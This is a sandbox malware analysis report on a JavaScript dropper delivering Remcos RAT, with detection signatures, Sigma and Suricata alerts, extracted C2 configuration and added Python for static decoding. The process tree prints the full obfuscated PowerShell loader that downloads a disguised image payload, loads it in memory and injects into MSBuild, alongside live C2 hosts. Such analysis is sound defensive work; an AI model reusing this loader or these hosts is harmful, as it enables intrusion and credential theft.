

Windows Analysis Report
PO_0099822111ORDER.js

Overview

General Information

Sample name: PO_0099822111ORDER.js
Analysis ID: 1575117
MD5: 9c23d2a7acc6acc81022dee56521c2ba
SHA1: 40a93bafef8bfeec099f8f8f758336fe41a82a81
SHA256: 9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e
Tags: js, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Paste sharing url in reverse order
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6884 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 7068 cmdline: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 7116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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';$asphyxiation = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($forsakers));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $asphyxiation MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • MSBuild.exe (PID: 4928 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • MSBuild.exe (PID: 7040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
            • MSBuild.exe (PID: 5648 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
            • MSBuild.exe (PID: 5644 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rrvrknybgidhfxrdnswxtjkjbwnl" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
            • MSBuild.exe (PID: 5808 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bmbkdyiuuqvmpdfhediqewfskcwuitz" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
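The process tree above shows two decoding steps an analyst has to undo to get at the payload without running it. Stage 1 (PID 7116) base64-decodes a quoted literal and reads it as UTF-16LE (`[Text.Encoding]::Unicode`) before handing it to a second powershell.exe. Stage 2 (PID 6372) downloads a file served as a .jpg from the Cloudinary URL, cuts out the text between `<<BASE64_START>>` and `<<BASE64_END>>`, reverses it character by character, base64-decodes the result into a .NET assembly, and calls `dnlib.IO.Home.VAI` with a URL written backwards (`'0/tBcDi/r/ee.etsap//:sptth'`) and the name of the process to inject into (`MSBuild`). The Python below is an added analyst aid, not part of the Joe Sandbox report or the malware, and reproduces those steps statically. Its inputs are constructed: the base64 blob that is elided from this copy of the report is replaced with a short placeholder, and the "image" is a fake JPEG wrapper around a fake assembly; only the `VAI` argument list is quoted verbatim from the PID 6372 command line.

```python
import base64
import re

# ---- Stage 1: powershell.exe -command $var = '<base64>'; ... Unicode.GetString(FromBase64String($var))
QUOTED_B64 = re.compile(r"\$\w+\s*=\s*'([A-Za-z0-9+/=]{8,})'")


def decode_stage1(cmdline: str) -> str:
    """Return the script stage 1 hands to the second powershell.exe.
    The loader decodes the literal with FromBase64String and reads it as UTF-16LE."""
    m = QUOTED_B64.search(cmdline)
    if not m:
        raise ValueError("no quoted base64 literal assigned to a variable")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


# ---- Stage 2: payload embedded between text markers inside a file served as a .jpg
START, END = b"<<BASE64_START>>", b"<<BASE64_END>>"


def extract_marked_payload(blob: bytes) -> bytes:
    """Cut the marked region, undo the character reversal, base64-decode.
    Works on bytes so arbitrary JPEG bytes around the markers cannot trip a text
    decoder; markers and the base64 alphabet are pure ASCII either way."""
    i, j = blob.find(START), blob.find(END)
    if i < 0 or j <= i:
        raise ValueError("markers missing or out of order")
    reversed_b64 = blob[i + len(START):j].strip()
    return base64.b64decode(reversed_b64[::-1])


def unreverse(s: str) -> str:
    """The loader stores the paste URL backwards and reverses it at runtime."""
    return s[::-1]


VAI_CALL = re.compile(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", re.S)


def parse_vai_args(cmdline: str) -> list[str]:
    """Pull the argument array passed to dnlib.IO.Home.VAI. Argument 0 is the
    reversed URL of the next stage; argument 4 names the injection host process."""
    m = VAI_CALL.search(cmdline)
    if not m:
        raise ValueError("no Invoke($null, @(...)) call found")
    args = re.findall(r"'([^']*)'", m.group(1))
    args[0] = unreverse(args[0])
    return args


# ---- constructed samples (not from the report) -----------------------------------------
STAGE1_INNER = ("powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile "
                "-command Write-Output placeholder")  # stands in for the elided inner script
SAMPLE_STAGE1_CMDLINE = (
    "powershell.exe -command $forsakers = '"
    + base64.b64encode(STAGE1_INNER.encode("utf-16-le")).decode()
    + "';$asphyxiation = [system.Text.encoding]::Unicode.GetString("
    "[system.Convert]::Frombase64String($forsakers));powershell.exe -command $asphyxiation")

FAKE_ASSEMBLY = b"MZ\x90\x00" + b"constructed stand-in for the .NET loader DLL"
SAMPLE_IMAGE = (b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 16            # fake JPEG head
                + START + base64.b64encode(FAKE_ASSEMBLY)[::-1] + END    # reversed base64 body
                + b"\xff\xd9")                                            # fake JPEG tail

# verbatim from the PID 6372 command line in the report
SAMPLE_VAI_CALL = ("$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', "
                   "'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan',"
                   "'constantan','constantan','constantan','constantan','1','constantan'))")

if __name__ == "__main__":
    print(decode_stage1(SAMPLE_STAGE1_CMDLINE))
    print(extract_marked_payload(SAMPLE_IMAGE)[:4])
    print(parse_vai_args(SAMPLE_VAI_CALL)[:5])
```

Against a real capture, feed `decode_stage1` the PID 7116 command line from process-creation telemetry and `extract_marked_payload` the bytes of the downloaded "jpg" (from a proxy log or the sandbox's dropped-files list); the decoded assembly can then go straight to a .NET decompiler, and the un-reversed paste URL is the next IOC to pull.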
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["160.25.73.25:6426:1", "ruffella.duckdns.org:6426:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QM0FWK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
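The extracted configuration above is what a hunt team keys on: two C2 endpoints in `host:port:password` form (one of them a DuckDNS name), the mutex, which Run keys the install routine is allowed to write, and the keylog folder and file name. The Python below is an added example (analyst tooling, not part of the report) that parses that JSON into discrete artifacts, splits the C2 triples, and flags dynamic-DNS hosts; the DDNS suffix list is an assumption. The Yara hit elsewhere in this report on `C:\ProgramData\remcos\logs.dat` is consistent with the `remcos\logs.dat` folder/file pair derived here.

```python
import json

# Verbatim from the "Found malware configuration" section of the report
REMCOS_CONFIG_JSON = r'''{"Host:Port:Password": ["160.25.73.25:6426:1", "ruffella.duckdns.org:6426:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QM0FWK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}'''

# Assumption: common free dynamic-DNS providers; extend for your environment
DDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "no-ip.com", "ddns.net", "hopto.org")

RUN_KEY = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"


def load_config() -> dict:
    return json.loads(REMCOS_CONFIG_JSON)


def parse_c2(entry: str) -> dict:
    """Split 'host:port:password'. The host never contains ':' here (no IPv6),
    so a left split with maxsplit=2 keeps any ':' inside the password intact."""
    host, port, password = entry.split(":", 2)
    return {"host": host, "port": int(port), "password": password,
            "dynamic_dns": host.lower().endswith(DDNS_SUFFIXES)}


def hunting_artifacts(cfg: dict) -> dict:
    """Turn the config into the things you can actually search for on hosts and in logs."""
    run_keys = [hive + "\\" + RUN_KEY for hive in ("HKCU", "HKLM")
                if cfg.get("Setup %s\\Run" % hive) == "Enable"]
    return {
        "c2": [parse_c2(e) for e in cfg["Host:Port:Password"]],
        "mutex": cfg["Mutex"],
        "run_keys": run_keys,
        "keylogging": cfg.get("Keylog flag") == "1",
        # relative to the "Keylog path" location; the report observed it under C:\ProgramData
        "keylog_relpath": cfg["Keylog folder"] + "\\" + cfg["Keylog file"],
        "screenshots": cfg.get("Screenshot flag") == "Enable",
    }


if __name__ == "__main__":
    print(json.dumps(hunting_artifacts(load_config()), indent=2))
```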
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author
0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
Source | Rule | Description | Author
10.2.MSBuild.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
10.2.MSBuild.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
10.2.MSBuild.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
10.2.MSBuild.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
10.2.MSBuild.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author
amsi64_6372.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Networking

Source: Process started | Author: Joe Security | Data: Command: the stage-2 PowerShell loader command line of PID 6372 (reproduced in full in the process tree above)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: the stage-2 PowerShell loader command line of PID 6372 (reproduced in full in the process tree above)
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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
Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 151.101.193.137, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6884, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49710
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, CommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6884, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, ProcessId: 7068, ProcessName: wscript.exe
Source: Network Connection | Author: Kiran kumar s, oscd.community | Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7040, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49722
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, CommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6884, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, ProcessId: 7068, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", ProcessId: 6884, ProcessName: wscript.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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
Source: Network Connection | Author: frack113 | Data: DestinationIp: 151.101.193.137, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6884, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49710
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: the stage-2 PowerShell loader command line of PID 6372 (reproduced in full in the process tree above)
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: the stage-2 PowerShell loader command line of PID 6372 (reproduced in full in the process tree above)
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", ProcessId: 6884, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: the stage-2 PowerShell loader command line of PID 6372 (reproduced in full in the process tree above)

                      Data Obfuscation

                      Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::F

                      Stealing of Sensitive Information

                      Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 7040, TargetFilename: C:\ProgramData\remcos\logs.dat

                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-12-14T14:00:43.282389+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 104.21.84.67 | 443 | 192.168.2.12 | 49719 | TCP
                      2024-12-14T14:00:43.282389+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 104.21.84.67 | 443 | 192.168.2.12 | 49719 | TCP
                      2024-12-14T14:00:46.120411+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49720 | 160.25.73.25 | 6426 | TCP
                      2024-12-14T14:00:49.386053+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49721 | 160.25.73.25 | 6426 | TCP
                      2024-12-14T14:00:24.604589+0100 | 2049038 | 1 | A Network Trojan was detected | 151.101.193.137 | 443 | 192.168.2.12 | 49711 | TCP
                      2024-12-14T14:00:49.266513+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.12 | 49722 | 178.237.33.50 | 80 | TCP
                      2024-12-14T14:00:44.237648+0100 | 2858295 | 1 | A Network Trojan was detected | 104.21.84.67 | 443 | 192.168.2.12 | 49719 | TCP
                      2024-12-14T14:00:42.871250+0100 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49719 | 104.21.84.67 | 443 | TCP

                      AV Detection

                      Source: ruffella.duckdns.org | Avira URL Cloud: Label: malware
